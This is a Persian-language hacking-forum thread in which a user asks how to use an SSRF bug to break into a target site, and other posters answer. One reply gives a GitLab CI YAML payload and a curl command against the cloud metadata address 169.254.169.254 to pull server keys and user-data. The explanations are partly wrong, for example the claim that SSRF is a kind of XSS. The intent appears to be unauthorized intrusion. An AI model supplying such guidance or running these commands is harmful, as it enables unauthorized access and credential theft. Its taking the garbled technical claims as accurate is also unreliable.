discord icon
سرور دیسکورد گاردایران

پست های پیشنهاد شده

سلام دوستان

سایتی مدنظرمه که روی سرورش یه سایت با باگ SSRF وجود داره 

کسی می تونه نحوه نفوذ به سایت با باگ SSRF رو بهم توضیح بده ؟؟ تو مقالات انگلیسی که پیدا کردم توضیحات برام گنگ بود و موفق نشدم 

 

Bug_BVB.jpg

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

سلام این یک نوع باگ از نوع xss 

هست 

از این لینک ببینید فکر کنم بهتر متوجه بشید

https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در 6 ساعت قبل، armanbabaei گفته است :

سلام این یک نوع باگ از نوع xss 

هست 

از این لینک ببینید فکر کنم بهتر متوجه بشید

https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html

پس در این حالت فقط میشه اطلاعات کاربرهایی که به سایت وصل میشند رو بدست آورد و بدرد بدست آوردن DBS سرور نمیخوره !!!

اگه اشتباه می کنم لطفا راهنماییم کنید

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در 50 دقیقه قبل، armanbabaei گفته است :

درست میگید

اگه به فکر دیتابیس هستید بهتر از تارگتتون بتونید باگ sql پیدا کنید

از پنج سایتی که روی سرور هست هیچ کدوم مناسب SQL INJECTION نیست !!

مشکل اصلی منم دقیقا همینه و چون حالت پروژه هست باید راهی پیدا کنم برای نفوذ

به هر حال مرسی آرمان جان از بابت راهنماییهات

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

نه عزیز اشتباه میکنی برای همه چیز بدرد میخوره خب بزار از طریف ssrf شروع کنیم که ببینیم باگی که شما پیدا کردید اصلا این هست یا نه 

خب امید وارم با واژه ی uri  اشنایی داشته باشید وقت شما میتونید در یک سایت لینکی بزارید مثلا شما به یک سایت url میدید که اون رو که یک عکس یا بکگراند هست رو روی پروفایل یا بکگراند فروم شما بزاره خب حالا این میتونه webhook ها باشه یا .....
پس شما هر uri  که بدید این تبدیل به csv میشه یا بقول خودمونی هر لینکی شما بدید سرور تبدیل به دیتاش میکنه یا میریزتش توی فایلی که csv هست 

خب حالا اگر ما با چیزی مثل  etc/password/.... که توی sqli هم هست  یا /admin/add_user /user:mesvak&password: something  
اون لینک مون رو بفرستیم شما میتونید یک یوزر پسورد بدون هیچ لوگین کردنی به ادمین یا پنل بسازید 
از اون etc/password  هم مطمعنن  میدونید میشه دیتابیس و هرچیزی که میخواید رو بگیرید 

ولی یک مقدار کار پیچیده ای هست اموزشی براتون اماده میکنم میزارم بزودی که میشه دیتا رو هم بگیری ولی بیشتر مواقع یا نمیشه بایپس کرد مثلا سایتای بزرگ و خوبی مثل ebay امتحان کردم نشد 
بستگی به امنیت اون سایت ها هم داره و یک طور بایپس پیاده میکنید 
و چیز جالب درباره ی این باگ اینه که چون یک مقدار پیچدست و دانش کد زنی داشته باشی تا یک چیزارو بگذرونی و اکسپلویت های زیادی براش نیست  پس خیلی از سایت های خوب دارند ولی کسی نمیدونه (برعکس sqli)  

درباه گرفتن اطلاعات که گفتید بله میشه قشنگ اطلاعات خیلی زیادی ازش بدست اورد و حتی پورت ها رو عوض کنید که بایپس کنید چون معمولا سایت ها یی که امنیت بالایی دارند 
1- فقط پورت های 443 و 80 رو باز میزارند که میدونید برای چی هست
2-فقط ایپی سایت رو مخصوص هاست خارجی قرار میدند یعنی شما به دیتا دسترسی نخواهی داشت (بندرت دیده میشه ولی ای بی اینکارو کرده )
3-و قطع دسترسی هرگونه پروتکلی که https or http نیست 

خب برای بایپس کردنشون باید راهی مخالف اینا پیدا کنی اولی میشه من تو کالی یک پیلود و اکسپلویت دارم که اینکارو کردم پابلیکش نمیکنم  و قسمت دوم رو راهی فعلا ندارم 
قسمت سوم هم بایپسش توی اینترنت فکر کنم هست ولی بگیر نگیر داره 

برای مثال یک سمپل قدیمی میزنم یک سایتی خیلی وقت پیش تقریبا 2 هفته پیش این شکلی یک پیلود  yml اپ شده و apis   رو گرفتم  metadata بخش مهمی که براحتی میتونی با این باگ دسترسی پیدا کنی و api سایت و توکن و حتی تموم سورس ها مثل این مثال ببینی خب این سایت خودش یک رانر بود روی لینوکس یعنی برنامشو نصب میکردی و فایل هایی با فرمت yml رو ران میکرد پس یک فایل میسازیم با فرمت yml توش اکسپلویتمون رو میزاریم 




 


image: node:latest
cache:
  paths:
  - node_modules/

test:
  stage: test
  script:
    - npm install
    - npm test

pack:
  stage: deploy
  script:
    - chmod +x run.sh
    - ./run.sh
    - npm install
    - npm pack
  artifacts:
    paths:
    - ./*.tgz

 

پسوند رو باید یک چیزی بزاری که بتونه نفوذ کنه خوب این برنامه این رو یک طور دیباگ استارت میکنه اگر اینطوری بزاری  gitlab-ci.yml
پس یک فایل با این پسوند میسازیم  بعد میزنیم دستور لینوکس رو اینطوری 

curl -L http://169.254.169.254/metadata/v1/


خب کرل همونطور که میدونی دیتای اون قسمت هاست رو بما میده خوب پس ما یک اکسپلویت اجرا کردیم و حالا اون قسمتم بعدش اجرا میکنیم که ببینیم ایا اطلاعاتی بما میده از اون قسمت یا نه اگر در حالت معمولی باشه هیچی نمیده 

ولی بعد از دو بار ران کردنه پیلود بالا اینارو میشه گرفت 

 

id
hostname  
user-data  
vendor-data  
public-keys  
region  
interfaces/  
dns/  
floating_ip/  
tags/  
features/  


خب اینا همون چیزای خصوصی و شخصی سرور که گفتم میبینی چه چیزایی نشون داده و ما به چه داده هایی دسترسی داریم حالا با دستور cd وارد هر کدوم خواستی میشی و ls میگیری هر بار که ببینی کجایی چی ران و.... 
هر چیم خواستی بدرد خور بود با دستور فایل چکش میکنی دانلودش میکنی


و اینا اخرش بگم bug bounty  اگر شنیده باشی این روزا خیلی کاربرد داره تقریبا هکر ها رو بروش خوبی برده که با هک کردن بصورت قانونی پول در میاری و این باگ هم داغ این روزا بازارش 

برای همین باگ بالا سایت سازندش 4000 دلار داد 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در 22 ساعت قبل، mrmesvak گفته است :

نه عزیز اشتباه میکنی برای همه چیز بدرد میخوره خب بزار از طریف ssrf شروع کنیم که ببینیم باگی که شما پیدا کردید اصلا این هست یا نه 

خب امید وارم با واژه ی uri  اشنایی داشته باشید وقت شما میتونید در یک سایت لینکی بزارید مثلا شما به یک سایت url میدید که اون رو که یک عکس یا بکگراند هست رو روی پروفایل یا بکگراند فروم شما بزاره خب حالا این میتونه webhook ها باشه یا .....
پس شما هر uri  که بدید این تبدیل به csv میشه یا بقول خودمونی هر لینکی شما بدید سرور تبدیل به دیتاش میکنه یا میریزتش توی فایلی که csv هست 

خب حالا اگر ما با چیزی مثل  etc/password/.... که توی sqli هم هست  یا /admin/add_user /user:mesvak&password: something  
اون لینک مون رو بفرستیم شما میتونید یک یوزر پسورد بدون هیچ لوگین کردنی به ادمین یا پنل بسازید 
از اون etc/password  هم مطمعنن  میدونید میشه دیتابیس و هرچیزی که میخواید رو بگیرید 

ولی یک مقدار کار پیچیده ای هست اموزشی براتون اماده میکنم میزارم بزودی که میشه دیتا رو هم بگیری ولی بیشتر مواقع یا نمیشه بایپس کرد مثلا سایتای بزرگ و خوبی مثل ebay امتحان کردم نشد 
بستگی به امنیت اون سایت ها هم داره و یک طور بایپس پیاده میکنید 
و چیز جالب درباره ی این باگ اینه که چون یک مقدار پیچدست و دانش کد زنی داشته باشی تا یک چیزارو بگذرونی و اکسپلویت های زیادی براش نیست  پس خیلی از سایت های خوب دارند ولی کسی نمیدونه (برعکس sqli)  

درباه گرفتن اطلاعات که گفتید بله میشه قشنگ اطلاعات خیلی زیادی ازش بدست اورد و حتی پورت ها رو عوض کنید که بایپس کنید چون معمولا سایت ها یی که امنیت بالایی دارند 
1- فقط پورت های 443 و 80 رو باز میزارند که میدونید برای چی هست
2-فقط ایپی سایت رو مخصوص هاست خارجی قرار میدند یعنی شما به دیتا دسترسی نخواهی داشت (بندرت دیده میشه ولی ای بی اینکارو کرده )
3-و قطع دسترسی هرگونه پروتکلی که https or http نیست 

خب برای بایپس کردنشون باید راهی مخالف اینا پیدا کنی اولی میشه من تو کالی یک پیلود و اکسپلویت دارم که اینکارو کردم پابلیکش نمیکنم  و قسمت دوم رو راهی فعلا ندارم 
قسمت سوم هم بایپسش توی اینترنت فکر کنم هست ولی بگیر نگیر داره 

برای مثال یک سمپل قدیمی میزنم یک سایتی خیلی وقت پیش تقریبا 2 هفته پیش این شکلی یک پیلود  yml اپ شده و apis   رو گرفتم  metadata بخش مهمی که براحتی میتونی با این باگ دسترسی پیدا کنی و api سایت و توکن و حتی تموم سورس ها مثل این مثال ببینی خب این سایت خودش یک رانر بود روی لینوکس یعنی برنامشو نصب میکردی و فایل هایی با فرمت yml رو ران میکرد پس یک فایل میسازیم با فرمت yml توش اکسپلویتمون رو میزاریم 




 



image: node:latest
cache:
  paths:
  - node_modules/

test:
  stage: test
  script:
    - npm install
    - npm test

pack:
  stage: deploy
  script:
    - chmod +x run.sh
    - ./run.sh
    - npm install
    - npm pack
  artifacts:
    paths:
    - ./*.tgz

 

پسوند رو باید یک چیزی بزاری که بتونه نفوذ کنه خوب این برنامه این رو یک طور دیباگ استارت میکنه اگر اینطوری بزاری  gitlab-ci.yml
پس یک فایل با این پسوند میسازیم  بعد میزنیم دستور لینوکس رو اینطوری 


curl -L http://169.254.169.254/metadata/v1/


خب کرل همونطور که میدونی دیتای اون قسمت هاست رو بما میده خوب پس ما یک اکسپلویت اجرا کردیم و حالا اون قسمتم بعدش اجرا میکنیم که ببینیم ایا اطلاعاتی بما میده از اون قسمت یا نه اگر در حالت معمولی باشه هیچی نمیده 

ولی بعد از دو بار ران کردنه پیلود بالا اینارو میشه گرفت 

 


id
hostname  
user-data  
vendor-data  
public-keys  
region  
interfaces/  
dns/  
floating_ip/  
tags/  
features/  


خب اینا همون چیزای خصوصی و شخصی سرور که گفتم میبینی چه چیزایی نشون داده و ما به چه داده هایی دسترسی داریم حالا با دستور cd وارد هر کدوم خواستی میشی و ls میگیری هر بار که ببینی کجایی چی ران و.... 
هر چیم خواستی بدرد خور بود با دستور فایل چکش میکنی دانلودش میکنی


و اینا اخرش بگم bug bounty  اگر شنیده باشی این روزا خیلی کاربرد داره تقریبا هکر ها رو بروش خوبی برده که با هک کردن بصورت قانونی پول در میاری و این باگ هم داغ این روزا بازارش 

برای همین باگ بالا سایت سازندش 4000 دلار داد 

توضیحاتتون خیلی عالی بود 

یه خواهش ازت دارم چون من قبلا با باگ SSRF هیچ زد و خوردی نداشتم فقط درحد اطلاعات شفاهی چیزهایی بدست آوردم که نمی تونم روش کار کنم اگه لطف داشتی یه فایل آموزشی ویدیویی از روشی که با کالی تست می کنی برامون بفرستی خیلی ممنون میشم حتی خواستین من سایتی که باگ SSRf داره بدم 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری